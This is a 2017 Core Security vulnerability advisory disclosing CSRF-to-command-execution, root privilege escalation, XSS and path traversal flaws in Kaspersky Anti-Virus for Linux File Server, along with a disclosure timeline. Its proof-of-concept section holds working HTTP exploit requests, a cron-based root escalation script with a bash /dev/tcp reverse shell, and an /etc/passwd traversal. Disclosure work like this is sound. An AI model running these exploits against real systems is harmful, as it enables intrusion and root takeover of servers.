1. *Advisory Information* Title: Kaspersky Anti-Virus File Server Multiple Vulnerabilities Advisory ID: CORE-2017-0003 Advisory URL: http://www.coresecurity.com/advisories/Kaspersky-Anti-Virus-File-Server-Multiple-Vulnerabilities Date published: 2017-06-28 Date of last update: 2017-06-28 Vendors contacted: Kaspersky Release mode: Forced release 2. *Vulnerability Information* Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Limitation of a Pathname to a Restricted Directory [CWE-22] Impact: Code execution, Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2017-9813, CVE-2017-9810, CVE-2017-9811, CVE-2017-9812 3. *Vulnerability Description* From Kaspersky Lab's website: "Large corporate networks that use file servers running on different platforms can be a real headache when it comes to antivirus protection. Kaspersky Anti-Virus for Linux File Server is part of our range of new and refreshed products, solutions and services for heterogeneous networks. It provides a superior protection with Samba server integration and other features that can protect workstations and file servers in even the most complex heterogeneous networks. It is also certified VMware Ready and supports current versions of FreeBSD for integrated, future-proof protection." Multiple vulnerabilities were found in the Kaspersky Anti-Virus for Linux File Server [2] Web Management Console. It is possible for a remote attacker to abuse these vulnerabilities and gain command execution as root. 4. *Vulnerable Packages* . Kaspersky Anti-Virus for Linux File Server 8.0.3.297 [2] Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Kaspersky [1] published the following Maintenance Pack: . Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312): https://support.kaspersky.com/13738/ 6. *Credits* This vulnerability was discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Kaspersky Anti-virus for Linux File Server comes bundled with a Web Management Console to monitor the application's status and manage its operation. One specific feature allows configuring shell scripts to be executed when certain events occur. This functionality is vulnerable to cross-site request forgery, allowing code execution in the context of the web application as the kluser account. The vulnerability is described in section 7.1. Moreover, it is possible to elevate privileges from kluser to root by abusing the quarantine functionality provided by the kav4fs-control system binary. This is described in section 7.2. Additional web application vulnerabilities were found, including a reflected cross-site scripting vulnerability (7.3) and a path traversal vulnerability (7.4). 7.1. *Cross-site Request Forgery leading to Remote Command Execution* [CVE-2017-9810]: There are no Anti-CSRF tokens in any forms on the web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The following request will update the notification settings to run a shell command when an object is moved to quarantine. For the full list of events refer to the product's documentation. Note that it is possible to add a script to all existing events in a single request, widening the window of exploitation. The proof-of-concept creates the file /tmp/pepperoni. Shell commands are run as the lower privilege kluser. Payload: /----- "notifier": {"Actions": [{"Command": "touch /tmp/pepperoni", "EventName": 22, "Enable": true, "__VersionInfo": "1 0"}] -----/ Request: /----- POST /cgi-bin/cgictl?action=setTaskSettings HTTP/1.1 Host: :9080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: http://:9080/ Content-Length: 3273 Cookie: wmc_useWZRDods=true; wmc_sid=690DE0005C5625A420255EFEBB3349F7; wmc_full_stat=1; wmc_logsSimpleMode=1; wmc_backupSimpleMode=1; wmc_quaSimpleMode=1; wmc_iconsole_lang=resource_en.js; wmc_show_settings_descr=false; iconsole_test; wmc_show_licence_descr=false Connection: close taskId=7& settings=%7B%22ctime%22%3A%201490796963%2C%20%22notifier%22%3A%20%7B%22Actions%22%3A%20%5B%7B%22Command%22%3A%20%22touch%20%2Ftmp%2Fpepperoni%22%2C%20%22EventName%22%3A%2022%2C%20%22Enable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22CommonSmtpSettings%22%3A%20%7B%22DefaultRecipients%22%3A%20%5B%5D%2C%20%22InternalMailerSettings%22%3A%20%7B%22ConnectionTimeout%22%3A%2010%2C%20%22SmtpPort%22%3A%2025%2C%20%22SmtpQueueFolder%22%3A%20%22%2Fvar%2Fopt%2Fkaspersky%2Fkav4fs%2Fdb%2Fnotifier%22%2C%20%22SmtpServer%22%3A%20%22%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22Mailer%22%3A%20%221%22%2C%20%22Sender%22%3A%20%22%22%2C%20%22SendmailPath%22%3A%20%22%2Fusr%2Fsbin%2Fsendmail%20-t%20-i%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22EnableActions%22%3A%20true%2C%20%22EnableSmtp%22%3A%20false%2C%20%22SmtpNotifies%22%3A%20%5B%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%201%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Anti-Virus%20started%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%206%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22License%20error%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%207%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Databases%20updated%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22snmp%22%3A%20%7B%22MasterAgentXAddress%22%3A%20%22tcp%3Alocalhost%3A705%22%2C%20%22PingInterval%22%3A%2015%2C%20%22TrapSuite%22%3A%20%7B%22AVBasesAppliedEventEnable%22%3A%20true%2C%20%22AVBasesAreOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAreTotallyOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAttachedEventEnable%22%3A%20true%2C%20%22AVBasesIntegrityCheckFailedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackCompletedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackErrorEventEnable%22%3A%20true%2C%20%22ApplicationSettingsChangedEventEnable%22%3A%20true%2C%20%22ApplicationStartedEventEnable%22%3A%20true%2C%20%22LicenseErrorEventEnable%22%3A%20true%2C%20%22LicenseExpiredEventEnable%22%3A%20true%2C%20%22LicenseExpiresSoonEventEnable%22%3A%20true%2C%20%22LicenseInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotRevokedEventEnable%22%3A%20true%2C%20%22LicenseRevokedEventEnable%22%3A%20true%2C%20%22ModuleNotDownloadedEventEnable%22%3A%20true%2C%20%22NothingToUpdateEventEnable%22%3A%20true%2C%20%22ObjectDeletedEventEnable%22%3A%20true%2C%20%22ObjectDisinfectedEventEnable%22%3A%20true%2C%20%22ObjectSavedToBackupEventEnable%22%3A%20true%2C%20%22ObjectSavedToQuarantineEventEnable%22%3A%20true%2C%20%22RetranslationErrorEventEnable%22%3A%20true%2C%20%22TaskStateChangedEventEnable%22%3A%20true%2C%20%22ThreatDetectedEventEnable%22%3A%20true%2C%20%22UpdateErrorEventEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22TrapsEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%7D &schedule=%7B%7D&skipCtimeCheck=true -----/ 7.2. *Privilege escalation due to excessive permissions* [CVE-2017-9811]: The kluser is able to interact with the kav4fs-control binary. By abusing the quarantine read and write operations, it is possible to elevate the privileges to root. The following proof-of-concept script adds a cron job that will be executed as root. /----- # Make sure the application is running /opt/kaspersky/kav4fs/bin/kav4fs-control --start-app # Create cron job in /tmp echo "* * * * * root /tmp/reverse.sh" > /tmp/badcron # Sample reverse shell payload cat > /tmp/reverse.sh << EOF #!/bin/bash bash -i >& /dev/tcp/172.16.76.1/8000 0>&1 EOF chmod +x /tmp/reverse.sh # Move the cron job to quarantine and grab the object ID QUARANTINE_ID=$(/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --add-object /tmp/badcron | cut -d'=' -f2 | cut -d'.' -f1) # Restore the file to /etc/cron.d /opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID --file /etc/cron.d/implant -----/ 7.3. *Reflected cross-site scripting* [CVE-2017-9813]: The scriptName parameter of the licenseKeyInfo action method is vulnerable to cross-site scripting. /----- http://:9080/cgi-bin/cgictl?action=licenseKeyInfo&do_action=licenseKeyInfo&scriptName=&active=&licenseKey=bla -----/ 7.4. *Path traversal* [CVE-2017-9812]: The reportId parameter of the getReportStatus action method can be abused to read arbitrary files with kluser privileges. The following proof-of-concept reads the /etc/passwd file. /----- GET /cgi-bin/cgictl?action=getReportStatus&reportId=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1 Host: :9080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */* Accept-Language: en-US,en;q=0.5 Referer: http://:9080/ Cookie: iconsole_test; wmc_useWZRDods=true; wmc_sid=99E61AFCD3EC96F5E349AB439DAE46C4; wmc_full_stat=1; wmc_logsSimpleMode=1; wmc_backupSimpleMode=0; wmc_quaSimpleMode=1; wmc_iconsole_lang=resource_en.js Connection: close -----/ 8. *Report Timeline* . 2017-04-03: Core Security sent an initial notification to Kaspersky, including a draft advisory. . 2017-04-03: Kaspersky confirmed reception of advisory and informed they will submit it to the relevant technical team for validation and replication. . 2017-04-06: Kaspersky confirmed they could reproduce three out of five reported vulnerabilities and asked us opinion on their justifications about mitigating factors on the other two. They also said they would inform us about a fix date in a few days. . 2017-04-06: Core Security thanked the confirmation and sent justification for one of the vulnerabilities questioned. Core Security agreed on removing one reported vulnerability since it can be mitigated via a product setting. . 2017-04-25: Kaspersky confirmed the rest of the vulnerabilities reported and are working on a fix. They said fixes will be released "till the June, 30", and also said will inform us the exact dates by the end of June. . 2017-04-25: Core Security thanked the confirmation of the final vulnerabilities list and asked for clarification about the release date. . 2017-04-25: Kaspersky clarified they will release the fix by June 30th and will let us know the exact date by mid June. . 2017-06-19: Kaspersky mentioned they would like to go ahead with the publication on June 30th and also asked for CVEs. . 2017-06-19: Core Security answer back proposing advisory publication to be July 3rd in order to avoid advisory publication on a Friday. Also asked for clarification about a fix dated June 14th found by Core Security researchers and whether or not it fixes the vulnerabilities reported. . 2017-06-21: Kaspersky answered back stating the fix dated June 14th is related to fixes for reported vulnerabilities. . 2017-06-21: Core Security asked if the June 14th patch (ID 13738) is fixing *all* the vulnerabilities reported in the current advisory. If so Core Security will be releasing the advisory sooner than planned. Reminded Kaspersky said they would release the fixes by June 30th. . 2017-06-22: Core Security sent a draft advisory with the final CVE IDs for each vulnerability. . 2017-06-23: Kaspersky said they will clarify about patch 13738 ASAP and also noted about a typo in the advisory's timeline. . 2017-06-23: Core Security requested again we need clarification around patch 13738 as soon as possible. . 2017-06-26: Core Security reviewed the patch released in June 14th and confirmed it addresses all the vulnerabilities reported. Core Security informed Kaspersky this advisory will be published as a FORCED release on Wednesday 28th. . 2017-06-28: Advisory CORE-2017-0003 published. 9. *References* [1] https://www.kaspersky.com [2] https://support.kaspersky.com/linux_file80 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.